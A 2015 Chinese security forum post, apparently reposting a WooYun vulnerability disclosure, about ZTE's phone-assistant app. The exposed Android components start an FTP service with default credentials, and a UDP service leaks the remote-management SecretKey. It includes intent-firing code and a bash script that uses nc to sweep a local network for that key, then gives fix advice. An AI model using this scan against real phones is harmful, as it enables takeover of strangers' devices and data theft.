效率源数据恢复论坛

 找回密码
 免费注册

QQ登录

用新浪微博登录

快捷导航
查看: 1924|回复: 4
打印 上一主题 下一主题

如果咖啡厅里有人冲你淫笑,你手机中的小秘密可能已经...

[复制链接]

646

主题

809

帖子

3587

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3587
跳转到指定楼层
楼主
发表于 2015-5-19 18:55:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

如果咖啡厅里有人冲你淫笑,那他可能正在偷窥你手机中的小秘密(公共场合被扒光的感脚)……公共Wi-Fi会泄露网络流量中的敏感信息这个已经人尽皆知。但大家可能还不清楚,在不可信的Wi-Fi中,黑客还有可能直接管理你的手机,获得所有通信录、短信、照片视频及应用信息。


除了公共Wi-Fi,在各种蹭网软件的大力配合下,在家睡觉手机都可能被人偷窥一遍,隔壁的女神显然不淡定了。


请看案例。


漏洞概要

缺陷编号:        WooYun-2015-94537

漏洞标题:        中兴手机助手本地提权与WIFI远程管理的认证机制绕过(详细Android分析过程与思路)   

相关厂商:        中兴通讯股份有限公司

漏洞作者:        小荷才露尖尖角

提交时间:        2015-01-29 11:34

公开时间:        2015-04-29 11:36

漏洞类型:        非授权访问/认证绕过

危害等级:        高

自评Rank:        20

漏洞状态:        厂商已经确认


包括两个漏洞:

第一个漏洞:本地组件暴露导致提权,只要用户安装中兴手机助手,无需任何权限的本地恶意应用就可在用户不知情的情况下启动供远程访问的FTP服务,且该FTP服务具有默认的用户名和密码。


暴露的两个安卓组件分别为 com.joinme.ftp.FtpServerService和JoinMeServiceReceiver。通过如下代码,

code 区域m_testbutton1=(Button)findViewById(R.id.BySvc);
        {
@Override
public void onClick(View v) {
// TODO Auto-generated method stub
Intent i = new Intent();
startService(i);
}
        });


或者

code 区域m_testbutton2=(Button)findViewById(R.id.ByReceiver);
        {
@Override
public void onClick(View v) {
// TODO Auto-generated method stub
Intent i = new Intent();
sendBroadcast(i);
}
        });


之一即可启动手机助手内置的FTP服务。


在分析第一个漏洞的时候,发现了第二个漏洞,与这个漏洞相比,上一个漏洞简直不算啥。


漏洞位于 JoinMeUdpService,该服务打开udp的65532端口监听,接收特定的命令字后可返回手机的敏感信息,包括SecretKey


如图,JoinMeUdpService的doListen方法


漏洞证明:

第一个漏洞的证明:


注意上面的SecretKey,就是中兴手机助手PC端管理手机的验证码。当手机助手在后台运行的情况下,可在PC端通过验证码完全管理手机,获得所有通信录、短信、照片及应用信息,并具有手机助手所有的添加、删改权限!!


比较有杀伤力的场景是在公共WIFI场所,在用户手机助手运行的情况下,通过以下脚本可以扫描获得SecretKey,并利用PC端进行远控!


scan.sh

code 区域#!/bin/bash
network="192.168.1"
for address in $(seq 1 254)
do
    echo  ${network}.${address}
    echo -n "JoinMe Broadcast" | nc  -w 2 -u  ${network}.${address}  65502
done


扫描结果


PC端远控相应手机


修复方案:

针对漏洞一: 设置com.joinme.ftp.FtpServerService、 JoinMeServiceReceiver为exported:false,或者设置自定义权限,并将保护级别设为signature。FTP服务的用户名和密码,不要硬编码在代码中,可以设置在配置文件中读取。或者由用户在PC端手机助手临时指定。


针对漏洞二:禁用远程回显SecretKey



分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享
回复

使用道具 举报

0

主题

36

帖子

904

积分

高级会员

Rank: 4

积分
904
QQ
沙发
发表于 2015-5-26 11:16:14 | 只看该作者
流量一般够用

回复 支持 反对

使用道具 举报

646

主题

809

帖子

3587

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3587
板凳
 楼主| 发表于 2015-5-26 13:36:35 | 只看该作者
流量一般够用[/quote]

回复 支持 反对

使用道具 举报

0

主题

36

帖子

904

积分

高级会员

Rank: 4

积分
904
QQ
地板
发表于 2015-5-28 17:03:25 | 只看该作者
?》???[/quote]
不用公共wifi   而且 小秘密啥的 没有

回复 支持 反对

使用道具 举报

646

主题

809

帖子

3587

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3587
5#
 楼主| 发表于 2015-5-28 18:22:13 | 只看该作者
不用公共wifi   而且 小秘密啥的 没有[/quote]
土豪的世界好难懂

回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

关闭

站长推荐上一条 /3 下一条

Copyright(C)2015-2016 四川效率源信息安全技术股份有限公司 版权所有|蜀ICP备09015844号|效率源数据恢复论坛  

GMT+8, 2024-12-1 01:14 , Processed in 0.229441 second(s), 28 queries .

Powered by Discuz! X3.2

© 2001-2014 技术支持: Weixiaoduo.com

快速回复 返回顶部 返回列表